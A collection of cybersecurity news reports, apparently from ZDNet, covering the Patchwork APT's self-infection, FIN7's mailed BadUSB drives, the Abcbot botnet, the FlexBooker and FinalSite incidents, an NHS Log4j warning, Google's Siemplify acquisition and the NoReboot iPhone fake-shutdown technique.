Information Technology

An Indian threat group’s inner workings have been exposed after it accidentally infected its own development environment with a remote access Trojan (RAT).

ZDNet Recommends

Dubbed Patchwork by Malwarebytes and tracked under names including Hangover Group, Dropping Elephant, Chinastrats, and Monsoon, the Indian group has been on the scene since at least 2015 and is actively launching campaigns designed to deploy RATs for the purposes of data theft and other malicious activities. In one of the latest attack waves connected to Patchwork, the group targeted individual faculty members from research institutions specializing in biomedical and molecular sciences. On January 7, the Malwarebytes team said it was able to delve into the advanced persistent threat (APT) group’s activities after Patchwork managed to infect its own systems with its own RAT creation, “resulting in captured keystrokes and screenshots of their own computer and virtual machines.” According to the cybersecurity researchers, Patchwork typically relies on spear-phishing attacks, with tailored emails sent to specific targets. These emails aim to drop RTF files containing the BADNEWS RAT, of which a new variant has now been found. The latest version of this malware, dubbed Ragnatela, was compiled in November 2021. The Trojan is capable of capturing screenshots, keylogging, listing OS processes and machine files, uploading malware, and executing additional payloads.  After examining Patchwork’s systems, the team ascertained that Ragnatela is stored in malicious RTF files as OLE objects, often crafted to be official communication from Pakistani authorities. An exploit for a known Microsoft Equation Editor vulnerability is used to execute the RAT. 

Based on the attacker’s control panels, Malwarebytes was able to name the Pakistani government’s Ministry of Defense, the National Defense University of Islamabad, the Faculty of Bio-Sciences (FBS) at UVAS University, the HEJ Research Institute at the University of Karachi, and the molecular medicine department at SHU University as organizations infiltrated by Patchwork.  Patchwork managed to infect its own development machine with Ragnatela, and so the researchers were also able to see them make use of VirtualBox and VMware virtual machines (VMs) to conduct malware testing.  “Other information that can be obtained is that the weather at the time was cloudy with 19 degrees and that they haven’t updated their Java yet,” Malwarebytes said. “On a more serious note, the threat actor uses VPN Secure and CyberGhost to mask their IP address.” This is the first time the group has been connected to attacks against the biomedical research community, which may suggest a pivot in Patchwork’s priority targets.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A cybercrime group has been mailing out USB thumb drives in the hope that recipients will plug them into their PCs and install ransomware on their networks, according to the FBI. The USB drives contain so-called ‘BadUSB’ attacks. They were sent in the mail through the United States Postal Service and United Parcel Service. One type contained a message impersonating the US Department of Health and Human Services and claimed to be a COVID-19 warning. Other malicious USBs were sent in the post with a gift card claiming to be from Amazon. 

ZDNet Recommends

BadUSB exploits the USB standard’s versatility and allows an attacker to reprogram a USB drive to, for example, emulate a keyboard to create keystrokes and commands on a computer, install malware prior to the operating system booting, or to spoof a network card and redirect traffic. SEE: Your cybersecurity training needs improvement because hacking attacks are only getting worseWhile BadUSB attacks aren’t common, cyber criminals in 2020 posted BadUSB drives to targets in the post with a message claiming to be from BestBuy that urged recipients to insert a malicious USB thumb drive into a computer in order view products that could be redeemed from a supposed gift card. That attack was attributed to the FIN7 group, which is also believed to be behind this attack.According to The Record, the FBI warned that the new BadUSB attacks were shipped on LILYGO-branded devices. The mail was delivered in packages to organizations in the transport and insurance sectors from August, while defense industry targets have received the packages since November. The USB drives were configured to register as a keyboard device after being plugged in. They then injected keystrokes into the target PC to install malware. Numerous attack tools were installed that allowed for exploitation of PCs, lateral movement across a network, and installation of additional malware.   

The tools were used to deploy multiple ransomware strains, including BlackBatter and REvil. BlackMatter is believed to be a rebrand of the DarkSide ransomware group, which appeared to close its business after attacking US fuel distributor Colonial Pipeline in May. This attack prompted discussions between the Biden Administration and the Kremlin over attacks on critical infrastructure.  More

Researchers have forged a “clear” link between the Abcbot botnet and a well-established cryptojacking cybercriminal group.First discovered In July 2021 by Netlab 360, the Abcbot botnet began as a simple scanner that used basic credential stuffing attacks and known vulnerability exploits to compromise vulnerable Linux systems. 

However, the developers quickly updated their creation to include self-update mechanisms, exploit kits, worm functionality, and a total of nine distributed denial-of-service (DDoS) attack functions. These findings were a starting point for Cado Security, which published a further analysis of the botnet in December. By this stage, Abcbot botnet was also able to detect and kill Docker image-based cryptocurrency miners and malware already present on a target server, as well as disable cloud monitors including Aliyun Alibaba Cloud Assistant and Tencent monitoring components. Trend Micro said that once a deep clean of compromised servers has taken place, new, malicious user profiles are added with high levels of privilege, and failsafes were deployed to stop them from being modified or removed.  While past examples of the botnet’s activity revealed a clean-up before it deployed its own cryptocurrency mining malware, on Monday, a new analysis published by Cado Security suggests the malware may be shifting back to more traditional routes: namely, a return to DDoS attacks as a focus.  According to the cybersecurity researchers, there is now an established link between the botnet and Xanthe, a cryptojacking campaign documented by Cisco Talos in December 2020.

Talos uncovered Xanthe after the group targeted a Docker-based honeypot with a Monero cryptocurrency miner, XMRig. At the time, Xanthe focused on hijacking computational resources of vulnerable servers to generate cryptocurrency and used bash scripts to eradicate competitor malware, as well as to maintain persistence.  After comparing the Abcbot botnet and Xanthe samples, Cado Security found code and feature similarities.  A VirusTotal graph based on known Indicators of Compromise (IoCs), stylistic choices, and unique strings then revealed four hosts that overlapped in infrastructure and delivered both Abcbot botnet and Xanthe malware campaigns.  However, the samples also revealed recent changes in functionality, including commented-out mining components, that suggest mining may “no longer [be] an objective” of Abcbot. “Based on this analysis, we believe that the same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks,” the researchers said. “We suspect this won’t be the last malware campaign we analyze from this actor.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Scheduling platform FlexBooker apologized this week for a data breach that involved the sensitive information of 3.7 million users. In a statement, the company told ZDNet a portion of its customer database had been breached after its AWS servers were compromised on December 23. FlexBooker said their “system data storage was also accessed and downloaded” as part of the attack. They added they worked with Amazon to restore a backup and they were able to bring operations back in about 12 hours. “We sent a notification to all affected parties and have worked with Amazon Web Services, our hosting provider, to ensure that our accounts are re-secured,” a spokesperson said. “We deeply apologize for the inconvenience caused by this issue.”The spokesperson said the data was “limited to names, email addresses, and phone numbers” and a website notifying customers of the breach says the same thing. But Australian security expert Troy Hunt, who runs the Have I Been Pwned site that tracks breached information, said the trove of stolen data included password hashes and partial credit card information for some accounts. Hunt added that the data “was found being actively traded on a popular hacking forum.”A FlexBooker spokesperson confirmed Hunt’s report, telling ZDNet that the last 3 digits of card numbers were included in the breach but not the full card information, expiration date, or CVV.  

Reporters from Bleeping Computer said the group behind the attack, Uawrongteam, leaked information from FlexBooker and two other companies on a hacking forum. They tied the breach to a DDoS attack that FlexBooker reported on December 23. In their log of the attack, FlexBooker said the attack caused widespread outages of their core application functionality and required help from AWS to solve. “We have been informed that this should not have been possible, but before they were able to assist technically, they had to ensure that all our security practices were correct. They have completed this step, and this has now gone to their leadership team who have approved dedicating technical resources to this immediately,” FlexBooker said of the assistance from AWS on December 24. “We truly apologize again for the impact here. We have been on the phone with AWS support for 7 hours now, trying to push them through. A brute force attack such as this should not have been possible, so we are pushing them hard to put a network-level solution in place to ensure this is both resolved quickly and also permanently so this never happens again in the future.”The issue was resolved about eight hours later. Shared Assessments’ Nasser Fattah said he has seen instances where DDoS attacks are sometimes launched as a distraction to disrupt vital business services while the adversary’s primary goal is to gain access and exfiltrate sensitive information. “We know that there are financial losses associated with system outages, hence, why security teams have all eyes on glass, so to speak, when there is a DDoS attack,” Fattah said. “And when this happens, it is important to be prepared for the possibility of a multifaceted attack and be very diligent with monitoring other anomalies happening on the network.” More

Education technology company FinalSite is still in the process of recovering from a devastating ransomware attack that crippled many of the services they provide to thousands of schools across the world this week. 

In an update on Friday morning, the company said the “vast majority” of its sites are back up and running on the front end, but many systems are still facing a variety of issues.They urged their customers — which include thousands of schools across 115 different countries — to limit “software usage to critical information updates for your front-end” until they have confirmed that all functionality is working fully. “Examples of usage to avoid include sending email/notifications, workflows, relying on calendar and athletic alerts, uploading data etc.,” the company said. While some front end systems are back, FinalSite said some styling may be missing, and users may not be able to access the admin side of their site. Many users will continue to see 503 errors, according to FinalSite. The company first informed customers of issues on January 4 and said its engineers have been working around the clock to resolve the issue. By Thursday, the company admitted that it was suffering from a ransomware attack.”We are incredibly sorry for this prolonged outage and fully realize the stress it is causing your organizations. While we have made progress overnight to get all websites up and running, full restoration has taken us longer than anticipated,” they wrote in a message to customers. 

“In the ensuing time since the incident, our security, infrastructure, and engineering teams have been working around the clock to restore backup systems and bring our network back to full performance, in a safe and secure manner. Third-party forensic specialists are assisting us in bringing things back slowly and carefully to ensure the environment is safe and stable.”One Reddit user said about 2,200 school websites hosted by Finalsite began to go down on January 4.  “Many districts are complaining that they are unable to use their emergency notification system to warn their communities about closures due to weather or COVID-19 protocol,” the user wrote. “The impact of this outage is far greater than the attention it has received.”A FinalSite spokesperson later told TechCrunch that about 5,000 of their 8,000 customers were affected by the ransomware incident. Local news outlets across the US reported school districts having issues with their websites. Another school administrator contacted Bleeping Computer to report that their website was down, forcing them to contact parents about the outage. They were told that there is no timetable for services to return to normal.Some schools took to Twitter to inform students and parents about website outages, noting to the public that their websites were down because of the ransomware attack on FinalSite. Former FBI analyst Crane Hassold likened the attack to the ransomware incident that affected Kaseya and said it illustrated the domino effect ransomware can have on other companies.”When a company that provides solutions for other companies gets hit with ransomware, similar to what we saw with Kaseya last summer, the resulting impact can be exponentially devastating,” said Hassold, who now serves as director of threat intelligence at Abnormal Security. “In the current environment, when COVID is peaking again, and many schools are switching to temporary remote learning, this attack couldn’t have come at a worse time.” More

The UK’s National Health Service (NHS) has issued a warning that hackers are actively targeting Log4J vulnerabilities and is recommending that organisations within the health service apply the necessary updates in order to protect themselves. An advisory by NHS Digital says that an ‘unknown threat group’ is attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells which could be use to distribute malware, ransomware, steal sensitive information and other malicious attacks. It’s unclear if the warning has been issued because attacks targeting NHS systems have been detected, or if the advisory has been released as a general precaution because of the ongoing problem of the critical security vulnerability in Java logging library Apache Log4j which was disclosed in December. “We are aware of an exploit and are actively monitoring the situation. We will support our partners with the system response to this critical vulnerability and will continue to provide guidance to NHS organisations,” an NHS spokesperson told ZDNet. The attacks being warned against exploit the Log4Shell vulnerability in the Apache Tomcat service embedded within VMware Horizon. Once the weaknesses have been identified, the attack uses the Lightweight Directory Access Protocol (LDAP) to execute a malicious Java file that injects a web shell into the VM Blast Secure Gateway service If successfully exploited, attackers can establish persistence on the affected networks and use this to carry out a number of malicious activities. NHS Digital recommends that organisations known to be running Horizon servers take the appropriate action and apply the necessary patches in order to ensure networks can resist attempted attacks. 

“Affected organisations should review the VMware Horizon section of the VMware security advisory VMSA-2021-0028 and apply the relevant updates or mitigations immediately,” said the alert. Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning that there’s a wide range of software in organisations around the world which could be at risk from attempts to exploit the vulnerability. Cyber criminals were quick to scan for vulnerable systems after the vulnerability was disclosed and a variety of cyber criminals and many took the opportunity to launch attacks including malware and ransomware campaigns. Attackers are still actively exploiting the vulnerability, Microsoft has warned. It’s feared that the widespread use of Log4j in open-source software – to the extent that there’s the potential that organisations may not know it’s even part of the ecosystem – could result in the vulnerability being a problem for years to come. The UK’s National Cyber Security Centre (NCSC) is among those which have issued advice to organisations on how to manage Log4j vulnerabilities in the long run. MORE ON CYBERSECURITY More

Google announced the acquisition of Siemplify, a security orchestration, automation, and response (SOAR) tool, this past Monday. Google Cloud’s acquisition of a SOAR tool in and of itself is not surprising — this has been a missing piece for its Chronicle offering that other security analytics platforms have built-in for the past several years. 

What is interesting, however, is the timing of this acquisition, which comes years after the spate of SOAR acquisitions from 2018-2019. Siemplify was one of the few remaining holdouts as a standalone SOAR, as most other independent SOAR vendors were acquired or diversified their portfolio with other products such as threat intelligence platforms (TIPs). In some ways, that makes this a heady acquisition, as it signals the true end of the standalone SOAR. Forrester predicted early on that the SOAR market could not stand on its own, and given that that was five years ago, it’s starting to feel like we are belaboring the point. The bottom line is this: The SIEM has irrevocably been altered to the more holistic security analytics platform, incorporating SIEM, SOAR, and SUBA in a single offering. Just offering a piece of the puzzle — a SOAR, a SIEM, or SUBA — is not enough. Security teams want a unified security analytics platform that they can use through the entire incident response lifecycle, from detection to investigation to the orchestration of response… and beyond?SOAR is part of a larger set of SecOps capabilities Security teams now have one less standalone SOAR offering to choose from. This is detrimental in some ways since some practitioners prefer to use a separate, independent SOAR offering. They find the depth of available integrations to be more powerful and prefer a tool and the vendor behind it to be entirely focused on improving automation in the SOC. While standalone SOAR is becoming a rarity, SOAR still exists in many forms. There are benefits to having a security analytics platform that tightly integrates SIEM and SOAR. A combined tool can help you implement more seamless automation and streamline the entirety of the incident response lifecycle in one place. It also gives you one less vendor to manage, and data from the latest Forrester Analytics Business Technographics® Security Survey shows that security pros are looking to consolidate security tooling. 

Buying SOAR as a standalone versus as part of a broader platform is the classic best-of-breed versus best-of-suite debate. The tricky part, though, is that SOAR is the supporting act, not the headliner. This means things get a little more complicated — as you will find in the flavors of SOAR below.Flavors of SOAR
Forrester
Consider the different flavors of SOAR and the risks of each:  Integrated security analytics platforms can provide tight integration and a simpler user experience. The main challenge with these vendors is ensuring that they stay cutting-edge — big suites of products tend to lead to complacency on innovation and bloat. Security analytics portfolios try to balance the best of what standalone SOAR offers while providing that integration (but this makes them more likely to fail at both as a jack of all trades). If these vendors struggle with one element of their SOAR offering, it’s more likely to be the integrations with other vendors than their own tools. SOAR + TIP + etc. vendors, or those with other additional areas of focus, bank on the fusion between SOAR and their other adjacent offerings. This can be unique and provides them a way of staying independent while still gaining ground in different markets. Combining SOAR and TIP capabilities also helps to operationalize threat intelligence in the SOC. Standalone SOAR can have a great depth of integrations because of its independence and its singular focus on building better automation for the SOC. Even if you choose a standalone SOAR, however, it may not be standalone for much longer. This post was written by Analyst Allie Mellen and it originally appeared here.  More

A new technique that fakes iPhone shutdowns to perform surveillance has been published by researchers. 

ZDNet Recommends

Best security key 2021

While robust passwords go a long way to securing your valuable online accounts, hardware-based two-factor authentication takes that security to the next level.

Read More

Dubbed “NoReboot,” ZecOps’ proof-of-concept (PoC) attack is described as a persistence method that can circumvent the normal practice of restarting a device to clear malicious activity from memory. Making its debut with an analysis and a public GitHub repository this week, ZecOps said that the NoReboot Trojan simulates a true shutdown while providing a cover for the malware to operate — which could include the covert hijacking of microphone and camera capabilities to spy on a handset owner.  “The user cannot feel a difference between a real shutdown and a “fake shutdown,” the researchers say. “There is no user interface or any button feedback until the user turns the phone back “on”.”The technique takes over the expected shutdown event by injecting code into three daemons: InCallService, SpringBoard, and backboardd.  When an iPhone is turned off, there are physical indicators that this has been completed successfully, such as a ring or sound, vibration, and the Apple logo appearing onscreen — but by disabling “physical feedback,” the malware could create the appearance of a shutdown while a live connection to an operator is maintained. 
ZecOps
“When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction,” the researchers explained. “We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.”

The spinning wheel indicating a shutdown process can then be hijacked via backboardd and the SpringBoard function can both be forced to exit and blocked from restarting again. ZecOps said that by taking over SpringBoard, a target iPhone can “look and feel” like it is not turned on, which is the “perfect disguise for the purpose of mimicking a fake power off.” Users, however, still have the option of a forced restart. This is where tampering with backboardd further comes in — by monitoring user input, including how long buttons are held, a reboot can be simulated just before a true restart takes place, such as by displaying the Apple logo early.  “Stopping users from manually restarting an infected device by making them believe they have successfully done so is a notable malware persistence technique,” Malwarebytes commented. “On top of that, human deception is involved: Just when you thought it’s gone, it still pretty much there.” As the technique focuses on tricking users rather than vulnerabilities or bugs in the iOS platform, this is not something that can be fixed with a patch. ZecOps says that the NoReboot method impacts all versions of iOS and only hardware indicators could help in detecting this form of attack technique.  A video demonstration can be found below.

[embedded content]

Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More